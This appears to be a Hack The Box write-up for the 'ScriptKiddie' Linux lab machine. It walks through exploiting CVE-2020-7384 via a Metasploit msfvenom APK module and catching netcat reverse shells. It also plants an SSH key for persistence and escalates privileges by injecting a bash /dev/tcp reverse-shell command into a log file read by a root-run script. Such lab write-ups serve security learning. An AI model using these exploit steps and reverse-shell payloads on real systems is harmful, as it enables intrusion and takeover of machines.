HTB ScriptKiddie Writeup
INFO
Machine IP = 10.10.10.226
OS = Linux
Level = EASY
Points = 20
Write the IP of the machine to your /etc/hosts file
1
echo "10.10.10.226 scriptkiddie.htb" >> /etc/hosts
Scanning
1
nmap -sC -sV 10.10.10.226
Enumeration
Nmap:
1
2
3
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol
5000/tcp open http Werkzeug httpd 0.16.1 (Python 3.8.5)
the page has a msfvenom upload tab…which can take a template. searched google for msf template upload vuln.Found it has a CVE-2020-7384,found a github page…git cloned the code..ran the program ,got an apk file
1
2
3
4
5
https://www.exploit-db.com/exploits/49491
Or
https://www.rapid7.com/db/modules/exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection/
1
2
3
4
5
6
msf6 > use exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > set LHOST <Your IP Address>
msf6 exploit(unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection) > run
[+] msf.apk stored at /home/kali/.msf4/local/msf.apk
1
2
nc -lnvp 4444
Then upload apk to site and set IP to 127.0.0.1 or any IP Address and chose Android to get a reverse shell
1
2
3
4
listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.226] 38492
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
Also you can do this steps to get a ()
- Get id_rsa.pub from your VM or pc
- On reverse shell add your id_rsa to
1
echo "ssh-rsa ****=" >> ~/.ssh/authorized_keys
Then do ssh
1
ssh [email protected]
``` python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ kid@scriptkiddie:~/html$
kid@scriptkiddie:~/html$ cd ~ cd ~ kid@scriptkiddie:~$ ls ls html logs snap user.txt kid@scriptkiddie:~$ cat user.txt cat user.txt
1
2
3
4
5
Let's enumerat a logs folder
- Logs folder have only hackers file and it's empty
- Home directory have two users (kid - pwn) and root user in ``` /etc/passwd ```
In pwn found a scanlosers.sh file..having the code.
#!/bin/bash
log=/home/kid/logs/hackers
cd /home/pwn/ cat $log | cut -d’ ‘ -f3- | sort -u | while read ip; do sh -c “nmap –top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null” & done
if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi
1
2
Go to logs folder, and run a reverse shell through the following code.
echo “ ;/bin/bash -c ‘bash -i >& /dev/tcp/10.10.15.26/8181 0>&1’ #” » hackers
1
2
And run a netcat
nc -lnvp 8181
1
2
On revers shell run this
sudo msfconsole
msf6 > /bin/bash stty: ‘standard input’: Inappropriate ioctl for device [*] exec: /bin/bash
cat /root/root.txt
``` Done!
Hi there 👋 Support me!
Life is an echo—what you send out comes back.